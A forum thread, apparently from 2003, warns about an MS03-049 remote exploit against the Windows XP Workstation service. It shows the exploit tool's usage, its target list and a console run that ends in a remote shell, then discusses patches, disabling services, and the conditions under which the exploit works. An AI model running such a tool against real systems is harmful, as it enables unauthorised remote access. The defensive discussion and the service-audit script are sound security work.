heads up guys XP Workstation Service Remote Exploit

  1. #1
    Senior Member st1mpy's Avatar
    Join Date
    Jun 2003
    Posts
    111

    heads up guys XP Workstation Service Remote Exploit

    There is an exploit floating around for XP.


    [code]
    d:\>rpc_wks_bo.exe

    WKS service remote exploit MS03-049 by fiNis (fiNis[at]bk[dot]ru), ver:0.1.1
    -------------------------------------------------------------------
    Usage: rpc_wks_bo.exe [-ht]
    -h <IP> : Target IP
    -t <Type> : Target type (-t0 for a list)

    d:\>rpc_wks_bo.exe -t0

    Possible targets are:
    ============================
    1) Window XP Pro + SP0 [Rus]
    2) Window XP Pro + SP1 [Rus]
    3) Crash all

    d:\>rpc_wks_bo.exe -h localhost -t1

    [+] Prepare exploit string
    [+] Sleep at 2s ...
    [+] Setting up IPC$ session...
    [+] IPC$ session setup successfully!
    [+] Sending exploit ...
    [+] Initialize WSAStartup - OK
    [+] Socket initialized - OK
    [+] Try connecting to localhost:9191 ...[*] Connected to shell at localhost:9191
    [/code]

    Hope it helps, guys.
    Un Seen But Well Heard Of

  2. #2
    Senior Member
    Join Date
    Sep 2003
    Posts
    156
    Thanks for the heads up....


    Does this affect all versions of XP or just the Russian edition?
    t.e.k.n.o.

  3. #3
    Senior Member st1mpy's Avatar
    Join Date
    Jun 2003
    Posts
    111
    I dunno. That guy's web page was up, but now it's offline. He said the version for English is coming out too, but I dunno. Hope MS does something about it.
    Un Seen But Well Heard Of

  4. #4
    The Doctor Und3ertak3r's Avatar
    Join Date
    Apr 2002
    Posts
    2,743
    Not exactly new, but a very timely warning. Good find and warning.

    The info is in the M$ knowledge base here.
    The page has the links to the patches.
    Oh, the page was last updated on the 19th of November; first posted Nov 11th.

    Win XP users need to look at the updates associated with MS03-043


    My system is patched, but the service is off.

    It follows the standard rules:

    1/ Disable any unnecessary or unneeded services.
    2/ Keep up to date with the patches. This is hard for some, due to the number of systems and the need for testing of patches.
    3/ Prevent any ***** expert from changing your settings. (Any user on our work system faces dismissal if they enable ANY service; they have to hack their system to start with.)



    Cheers
    "Consumer technology now exceeds the average person's ability to comprehend how to use it... give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr
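
The two controls the post above recommends (service off, patches applied) can be audited on a Windows host in a few lines. This is an added example, not code from the thread: it targets current Windows (PowerShell 3.0 or later for Get-CimInstance), checks the Workstation service (LanmanWorkstation, the "WKS service" the exploit hits), and looks for a hotfix whose KB number this page does not give, so `KB-PLACEHOLDER` is an assumption the reader must replace.

```powershell
# Added example: audit one host for the controls listed in the post above.
# Assumes PowerShell 3.0+ (Get-CimInstance); the required KB id is a placeholder.
function Test-WksExposure {
    param(
        # Hotfix IDs that close the hole. The page does not state the KB number,
        # so this is a placeholder to be replaced with the real id(s) for your OS.
        [string[]]$RequiredHotfix = @('KB-PLACEHOLDER')
    )

    # Win32_Service exposes both the live state and the configured start mode,
    # so we can tell "stopped right now" from "disabled at boot".
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='LanmanWorkstation'"
    $serviceRunning = ($null -ne $svc) -and ($svc.State -eq 'Running')
    $startMode = if ($null -ne $svc) { $svc.StartMode } else { 'NotInstalled' }

    # Get-HotFix lists installed updates; HotFixID looks like "KB123456".
    $installed = @(Get-HotFix -ErrorAction SilentlyContinue | ForEach-Object { $_.HotFixID })
    $patched = @($RequiredHotfix | Where-Object { $installed -contains $_ }).Count -gt 0

    # The service is only reachable over the network while it is running, so a host
    # is flagged as exposed when the service runs AND none of the fixes is present.
    [pscustomobject]@{
        ComputerName   = $env:COMPUTERNAME
        ServiceRunning = $serviceRunning
        StartMode      = $startMode
        Patched        = $patched
        Exposed        = ($serviceRunning -and -not $patched)
    }
}

Test-WksExposure | Format-List
```

Disabling LanmanWorkstation also removes the host's ability to connect to network shares, which is why the post treats turning it off as a choice for machines that do not need it rather than a blanket rule.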

  5. #5
    Senior Member st1mpy's Avatar
    Join Date
    Jun 2003
    Posts
    111
    Ehehe, yeah, not that new, but it still exploits, so yeah, patch it boyz. I run 2k so np with me, hehe.
    Un Seen But Well Heard Of

  6. #6
    Junior Member
    Join Date
    Oct 2002
    Posts
    7
    First of all, that code can never run. You need to run-time link the WKSSVC.dll function NetAddAlternateComputerName. Remember, this is an undocumented function.
    Also, it only works on FAT32, so the English version will have to wait.
    Read about it here:
    http://www.eeye.com/html/Research/Ad...D20031111.html
    But there is still much work to be done, because the exploit is deep in the logging function, which doesn't even get executed if your default IPC$ session is on NTFS.
    By the way, the code crashes my w2k box, but only after I connect to it via an IPC$ session with the admin password as opposed to no password. Meanwhile, it doesn't crash my XP. I keep them both up to date as of last week.
    So, sorry to say, but the script kiddies will have to wait on this one. However, the patch will probably fix the logging function, so even if you find a way to execute it, this exploit will have a hard time spreading.

  7. #7
    Senior Member
    Join Date
    Feb 2002
    Posts
    500
    Just FYI, I got a copy of this code that works on XP SP1 English. I think it was made for Rus, but it works here on the English version next to me.
    Ron Paul: Hope for America
    http://www.ronpaul2008.com/

  8. #8
    Junior Member
    Join Date
    Oct 2002
    Posts
    7
    FAT32 or NTFS file system? Did you compile it from source or get the executable from somewhere?

  9. #9
    Senior Member
    Join Date
    Feb 2002
    Posts
    500
    NTFS. It was a pre-compiled exe, surprise, and I just happened to try it on our techroom computer at work. I definitely had write access to the drive, not sure about much else; didn't have too much time to play. Although it did not work on another computer across the room, not sure why...
    Ron Paul: Hope for America
    http://www.ronpaul2008.com/
